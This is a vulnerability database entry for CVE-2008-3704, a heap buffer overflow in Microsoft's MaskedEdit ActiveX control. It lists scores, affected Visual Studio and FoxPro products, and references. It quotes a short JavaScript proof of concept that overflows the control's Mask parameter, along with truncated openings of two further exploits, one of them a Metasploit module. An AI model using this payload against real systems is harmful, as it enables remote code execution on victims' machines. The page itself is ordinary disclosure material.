Published: 18/08/2008 Updated: 12/10/2018

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 945

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Heap-based buffer overflow in the MaskedEdit ActiveX control in Msmask32.ocx 6.0.81.69, and possibly other versions prior to 6.0.84.18, in Microsoft Visual Studio 6.0, Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 allows remote malicious users to execute arbitrary code via a long Mask parameter, related to not "validating property values with boundary checks," as exploited in the wild in August 2008, aka "Masked Edit Control Memory Corruption Vulnerability."

Vulnerable Product	Search on Vulmon	Subscribe to Product
microsoft visual foxpro 9.0
microsoft visual foxpro 8.0
microsoft visual studio 6.0
microsoft visual basic 6.0
microsoft visual studio .net 2002
microsoft visual studio .net 2003

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf=''; for (i=1;i<=1945;i++){buf=buf+unescape("%0C");} documentwrite(body+buf+body1); # milw0rmcom [2008-08-14] ...

Microsoft Visual Studio (Msmask32ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: wwwmilw0rmcom/exploits/6244 ( Not by me ) My first ActiveX exploit, learned quite a bit playing with this one Heaps are handy ################################################# Loaded File: C:\WINDOWS\system32\MSMASK32OCX Name: ...

## # $Id: ms08_070_visual_studio_msmaskrb 11127 2010-11-24 19:35:38Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'ms ...

CWE-119 http://www.securityfocus.com/bid/30674 http://www.securitytracker.com/id?1020710 http://www.us-cert.gov/cas/techalerts/TA08-344A.html http://secunia.com/advisories/31498 http://support.avaya.com/elmodocs2/security/ASA-2008-473.htm http://www.vupen.com/english/advisories/2008/3382 http://www.vupen.com/english/advisories/2008/2380 https://exchange.xforce.ibmcloud.com/vulnerabilities/44444 https://www.exploit-db.com/exploits/6317 https://www.exploit-db.com/exploits/6244 https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5794 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-070 https://nvd.nist.gov https://www.exploit-db.com/exploits/6244/

CVE-2008-3704

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect